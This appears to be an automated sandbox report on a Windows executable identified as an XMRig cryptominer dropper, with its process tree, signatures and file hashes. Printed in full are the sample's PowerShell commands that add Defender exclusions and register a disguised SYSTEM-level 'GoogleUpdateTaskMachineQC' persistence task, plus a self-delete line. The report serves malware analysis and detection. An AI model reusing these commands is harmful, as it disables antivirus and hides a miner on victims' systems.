Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1799s
  • max time network
    1799s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/Be5sCbvuma2nkHDa.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 29 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Be5sCbvuma2nkHDa.exe
    "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Be5sCbvuma2nkHDa.exe"
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    PID:1608
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3456
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:636
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3544
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Be5sCbvuma2nkHDa.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3732
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1096
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:4504
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:5076
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
        2⤵
          PID:3160
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          PID:1936
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe qtdiqnkejoz
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3400
      • C:\Windows\System32\choice.exe
        choice /C Y /N /D Y /T 3
        1⤵
          PID:3392
        • C:\Program Files\Google\Chrome\updater.exe
          "C:\Program Files\Google\Chrome\updater.exe"
          1⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Drops file in Program Files directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3840
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          1⤵
            PID:3044
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            1⤵
            • Detects videocard installed
            PID:1416
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            1⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:5072

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            386KB

            MD5

            67179f376ac027acbb817da3b5a5988a

            SHA1

            ed3af156c9437be3f0819d780574bf36d062b45c

            SHA256

            5d5580b96c1f97daf8b05f6e4492cd71cf682fb3f01a2b786d59ba79d7de6c9b

            SHA512

            77d2b5af53df31ec0d51cc69ce193d7ea6cc0d9b2c9c9124b46ababf1109f6eb48f0e907ab60db1f613e1d940a3526c48c41603eb50676a1271e696e06fddd39

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            133KB

            MD5

            c6c448421fbe4bd05cdc8ec64f80f43f

            SHA1

            5e81d76bf8211db99f14dd99c566e4bfb74ed715

            SHA256

            84b599e9c2adcb8faf23490044e8212e40295a297d867bb367626bce680d8ac6

            SHA512

            f107edaaa96f012d76aa3ee4f4aa64a329dfa6ad4c616eda13434c45a56568462ff5cfed2922b09024e5024e88d0944255132d3ec17969e9251ea7ac573ca4bd

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            77d622bb1a5b250869a3238b9bc1402b

            SHA1

            d47f4003c2554b9dfc4c16f22460b331886b191b

            SHA256

            f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

            SHA512

            d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            e74d013e3041d65dbaaaf67c3342b71d

            SHA1

            feab41826b7240e5c2836b9970c12a438e992c73

            SHA256

            75f6dfe01596420b3e1491be0fa37ed2db9c36f580a4763b907819fb7f623762

            SHA512

            a7cd146c4fc8e4f618f02a7119a52b5c629cf0d978e1851f6222dca2f378d2e0712690f428732ece68959902bcc57133a53a46c953dde591dc3f8f9c8ecae5e4

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dwfo3io1.ehc.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/636-1-0x000002A2EB2D0000-0x000002A2EB2F2000-memory.dmp
            Filesize

            136KB

          • memory/636-11-0x00007FF8188E0000-0x00007FF8193A1000-memory.dmp
            Filesize

            10.8MB

          • memory/636-16-0x00007FF8188E0000-0x00007FF8193A1000-memory.dmp
            Filesize

            10.8MB

          • memory/636-13-0x000002A2E9250000-0x000002A2E9260000-memory.dmp
            Filesize

            64KB

          • memory/636-12-0x000002A2E9250000-0x000002A2E9260000-memory.dmp
            Filesize

            64KB

          • memory/1096-48-0x0000021C6C440000-0x0000021C6C450000-memory.dmp
            Filesize

            64KB

          • memory/1096-47-0x0000021C6C440000-0x0000021C6C450000-memory.dmp
            Filesize

            64KB

          • memory/1096-37-0x00007FF8188E0000-0x00007FF8193A1000-memory.dmp
            Filesize

            10.8MB

          • memory/1096-52-0x00007FF8188E0000-0x00007FF8193A1000-memory.dmp
            Filesize

            10.8MB

          • memory/1608-0-0x00007FF647250000-0x00007FF647461000-memory.dmp
            Filesize

            2.1MB

          • memory/1608-36-0x00007FF647250000-0x00007FF647461000-memory.dmp
            Filesize

            2.1MB

          • memory/3160-164-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-144-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-176-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-174-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-172-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-170-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-168-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-166-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-136-0x0000019D6A780000-0x0000019D6A7A0000-memory.dmp
            Filesize

            128KB

          • memory/3160-162-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-160-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-158-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-156-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-154-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-180-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-152-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-150-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-148-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-146-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-178-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-182-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-142-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-140-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-138-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-135-0x0000019D6A760000-0x0000019D6A780000-memory.dmp
            Filesize

            128KB

          • memory/3160-122-0x0000019D6A5E0000-0x0000019D6A600000-memory.dmp
            Filesize

            128KB

          • memory/3160-121-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-184-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-186-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-123-0x0000019D6A740000-0x0000019D6A760000-memory.dmp
            Filesize

            128KB

          • memory/3160-125-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-134-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-127-0x0000019D6A780000-0x0000019D6A7A0000-memory.dmp
            Filesize

            128KB

          • memory/3160-126-0x0000019D6A760000-0x0000019D6A780000-memory.dmp
            Filesize

            128KB

          • memory/3160-129-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-131-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3160-132-0x00007FF6C1A30000-0x00007FF6C2224000-memory.dmp
            Filesize

            8.0MB

          • memory/3400-130-0x00007FF7AFC10000-0x00007FF7AFC26000-memory.dmp
            Filesize

            88KB

          • memory/3400-124-0x00007FF7AFC10000-0x00007FF7AFC26000-memory.dmp
            Filesize

            88KB

          • memory/3544-34-0x00007FF8188E0000-0x00007FF8193A1000-memory.dmp
            Filesize

            10.8MB

          • memory/3544-30-0x000001D861020000-0x000001D861030000-memory.dmp
            Filesize

            64KB

          • memory/3544-29-0x000001D861020000-0x000001D861030000-memory.dmp
            Filesize

            64KB

          • memory/3544-28-0x00007FF8188E0000-0x00007FF8193A1000-memory.dmp
            Filesize

            10.8MB

          • memory/3544-32-0x000001D861020000-0x000001D861030000-memory.dmp
            Filesize

            64KB

          • memory/3544-31-0x000001D861020000-0x000001D861030000-memory.dmp
            Filesize

            64KB

          • memory/3840-120-0x00007FF797F30000-0x00007FF798141000-memory.dmp
            Filesize

            2.1MB

          • memory/3840-53-0x00007FF797F30000-0x00007FF798141000-memory.dmp
            Filesize

            2.1MB

          • memory/4504-64-0x000001B4EED80000-0x000001B4EED90000-memory.dmp
            Filesize

            64KB

          • memory/4504-76-0x000001B4F1220000-0x000001B4F12D5000-memory.dmp
            Filesize

            724KB

          • memory/4504-82-0x000001B4F1470000-0x000001B4F1476000-memory.dmp
            Filesize

            24KB

          • memory/4504-84-0x000001B4EED80000-0x000001B4EED90000-memory.dmp
            Filesize

            64KB

          • memory/4504-83-0x000001B4F1480000-0x000001B4F148A000-memory.dmp
            Filesize

            40KB

          • memory/4504-80-0x000001B4F1490000-0x000001B4F14AA000-memory.dmp
            Filesize

            104KB

          • memory/4504-78-0x000001B4F1450000-0x000001B4F146C000-memory.dmp
            Filesize

            112KB

          • memory/4504-77-0x000001B4F12E0000-0x000001B4F12EA000-memory.dmp
            Filesize

            40KB

          • memory/4504-75-0x000001B4F1200000-0x000001B4F121C000-memory.dmp
            Filesize

            112KB

          • memory/4504-87-0x00007FF8188E0000-0x00007FF8193A1000-memory.dmp
            Filesize

            10.8MB

          • memory/4504-63-0x00007FF8188E0000-0x00007FF8193A1000-memory.dmp
            Filesize

            10.8MB

          • memory/4504-81-0x000001B4F1440000-0x000001B4F1448000-memory.dmp
            Filesize

            32KB

          • memory/4504-65-0x000001B4EED80000-0x000001B4EED90000-memory.dmp
            Filesize

            64KB

          • memory/4504-79-0x000001B4F1430000-0x000001B4F143A000-memory.dmp
            Filesize

            40KB

          • memory/5076-101-0x0000017C453C0000-0x0000017C453D0000-memory.dmp
            Filesize

            64KB

          • memory/5076-100-0x0000017C453C0000-0x0000017C453D0000-memory.dmp
            Filesize

            64KB

          • memory/5076-98-0x00007FF8188E0000-0x00007FF8193A1000-memory.dmp
            Filesize

            10.8MB

          • memory/5076-113-0x00007FF8188E0000-0x00007FF8193A1000-memory.dmp
            Filesize

            10.8MB

          • memory/5076-111-0x0000017C453C0000-0x0000017C453D0000-memory.dmp
            Filesize

            64KB